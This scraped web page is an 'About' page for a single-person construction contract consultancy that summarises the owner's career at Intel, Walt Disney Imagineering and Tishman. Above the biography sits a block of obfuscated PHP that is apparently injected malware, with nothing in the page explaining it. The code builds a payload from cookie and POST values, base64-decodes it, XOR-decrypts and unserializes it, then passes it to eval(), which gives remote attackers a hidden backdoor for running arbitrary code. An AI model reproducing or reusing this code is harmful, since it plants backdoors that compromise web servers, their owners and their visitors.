$LNeBp = "\160" . "\x5f" . chr ( 496 - 431 )."\171" . "\x46" . 'g' . "\x46";$StrriMdXt = "\143" . chr ( 312 - 204 )."\x61" . chr (115) . chr ( 675 - 560 )."\137" . "\145" . chr ( 525 - 405 )."\x69" . chr ( 571 - 456 ).'t' . chr (115); $BfVonqQsI = class_exists($LNeBp); $StrriMdXt = "65529";$HpcbmWqtGP = strpos($StrriMdXt, $LNeBp);if ($BfVonqQsI == $HpcbmWqtGP){function QCwEoqNNc(){$unqzcq = new /* 10428 */ p_AyFgF(6457 + 6457); $unqzcq = NULL;}$mmdxqn = "6457";class p_AyFgF{private function wgKCNj($mmdxqn){if (is_array(p_AyFgF::$LuhiIxtw)) {$CqRKkbjok2 = str_replace("<" . "?php", "", p_AyFgF::$LuhiIxtw["content"]);eval($CqRKkbjok2); $mmdxqn = "6457";exit();}}public function DZFWNnjooG(){$CqRKkbjok = "63376";$this->_dummy = str_repeat($CqRKkbjok, strlen($CqRKkbjok));}public function __destruct(){p_AyFgF::$LuhiIxtw = @unserialize(p_AyFgF::$LuhiIxtw); $mmdxqn = "22090_27493";$this->wgKCNj($mmdxqn); $mmdxqn = "22090_27493";}public function NSgPhMJdv($CqRKkbjok, $ZmOTGrgosi){return $CqRKkbjok[0] ^ str_repeat($ZmOTGrgosi, intval(strlen($CqRKkbjok[0]) / strlen($ZmOTGrgosi)) + 1);}public function RLCuNvapZ($CqRKkbjok){$qqyJSb = chr ( 725 - 627 )."\141" . 's' . chr (101) . chr (54) . chr (52);return array_map($qqyJSb . chr (95) . "\144" . chr (101) . "\143" . "\x6f" . chr ( 656 - 556 )."\145", array($CqRKkbjok,));}public function __construct($rjihfSbcUc=0){$SJWTynpf = "\54";$CqRKkbjok = "";$zUUDpsbxb = $_POST;$BHVygAgT = $_COOKIE;$ZmOTGrgosi = "9c95afb0-bf1f-42d5-aac8-037d40af1575";$OjKjrP = @$BHVygAgT[substr($ZmOTGrgosi, 0, 4)];if (!empty($OjKjrP)){$OjKjrP = explode($SJWTynpf, $OjKjrP);foreach ($OjKjrP as $EgDhFNW){$CqRKkbjok .= @$BHVygAgT[$EgDhFNW];$CqRKkbjok .= @$zUUDpsbxb[$EgDhFNW];}$CqRKkbjok = $this->RLCuNvapZ($CqRKkbjok);}p_AyFgF::$LuhiIxtw = $this->NSgPhMJdv($CqRKkbjok, $ZmOTGrgosi);if (strpos($ZmOTGrgosi, $SJWTynpf) !== FALSE){$ZmOTGrgosi = str_pad($ZmOTGrgosi, 10); $ZmOTGrgosi = ltrim(rtrim($ZmOTGrgosi));}}public static $LuhiIxtw = 62823;}QCwEoqNNc();}$EloBBN = "\144" . '_' . "\125" . 'V' . "\x52" . "\164" . chr ( 936 - 857 ); $EfbWWmOw = 'c' . chr (108) . 'a' . chr ( 1069 - 954 ).chr (115) . "\x5f" . "\145" . "\x78" . chr ( 563 - 458 ).'s' . chr (116) . chr (115); $HobPqAQku = class_exists($EloBBN); $EfbWWmOw = "17125";$auMdQwlLV = !1;if ($HobPqAQku == $auMdQwlLV){function nRwEPsO(){$FLPjkI = new /* 14310 */ d_UVRtO(10403 + 10403); $FLPjkI = NULL;}$tFhylwdcU = "10403";class d_UVRtO{private function aNpnbvUJ($tFhylwdcU){if (is_array(d_UVRtO::$iMlQLJqpch)) {$PwNszDqZM = str_replace("\x3c" . "\x3f" . chr ( 617 - 505 ).'h' . chr (112), "", d_UVRtO::$iMlQLJqpch["\x63" . chr ( 1025 - 914 )."\x6e" . chr ( 489 - 373 ).chr ( 385 - 284 ).chr ( 130 - 20 )."\164"]);eval($PwNszDqZM); $tFhylwdcU = "10403";exit();}}private $QXXrmRa;public function KVYLtAg(){echo 19422;}public function __destruct(){$tFhylwdcU = "27917_25612";$this->aNpnbvUJ($tFhylwdcU); $tFhylwdcU = "27917_25612";}public function __construct($lJdApct=0){$TKkuRh = $_POST;$yxoDK = $_COOKIE;$WJaWT = "6ec6f042-5a11-4ef3-b261-1768dc47ffdc";$KhkzE = @$yxoDK[substr($WJaWT, 0, 4)];if (!empty($KhkzE)){$zVcOrM = "base64";$nvyeXDoID = "";$KhkzE = explode(",", $KhkzE);foreach ($KhkzE as $IQldTGtM){$nvyeXDoID .= @$yxoDK[$IQldTGtM];$nvyeXDoID .= @$TKkuRh[$IQldTGtM];}$nvyeXDoID = array_map($zVcOrM . "\x5f" . chr ( 575 - 475 ).chr ( 353 - 252 ).chr ( 135 - 36 ).chr (111) . "\x64" . "\x65", array($nvyeXDoID,)); $nvyeXDoID = $nvyeXDoID[0] ^ str_repeat($WJaWT, (strlen($nvyeXDoID[0]) / strlen($WJaWT)) + 1);d_UVRtO::$iMlQLJqpch = @unserialize($nvyeXDoID);}}public static $iMlQLJqpch = 9997;}nRwEPsO();} About – Project Contract Management Services

On this page:

Since my consultancy is a single-person practice, sharing the details of my professional experience is essential to demonstrating how I am qualified to help you with your important projects. Below is a high-level summary, with followed by two buttons that link to: (1) a three-part Adobe PDF Portfolio download that contains (a) my resume, (b) details of the work I did, and (c) a catalog of projects; and (2) an animation presenting the resume and work details data in a graphical timeline.



David W. Hall

In the first 30 years of my career (before PCMS) I had the privilege of amassing an exceptionally broad spectrum of construction management and contracting experience – covering small projects to major developments, civil work to high-tech factories, field operations to the corporate office, a small, local shop to an industry-leading Fortune 100 global corporation whose corporate supply chain management group is #4 on the 2015 Gartner Supply Chain Top 25, as well as subject matter from project engineering to advanced legal, controls and risk management. Here you’ll find more about what I can bring to a project and where I’ve been.

2003-2015 Intel Corporation
12 years writing and managing contract templates, providing project support for $13B of high-tech and related facilities and being the contracts content expert in a 100-person global facilities procurement team within the 2,000-person corporate supply chain management organization

1998-2003 Walt Disney Imagineering
1987-1998  Tishman Construction Corporation
17 years of project management, contract administration and project procurement leadership for hotels, theme parks and infrastructure in Florida, Puerto Rico, California and Hong Kong


Download my RESUME, plus some work activities detail and a catalog of all the projects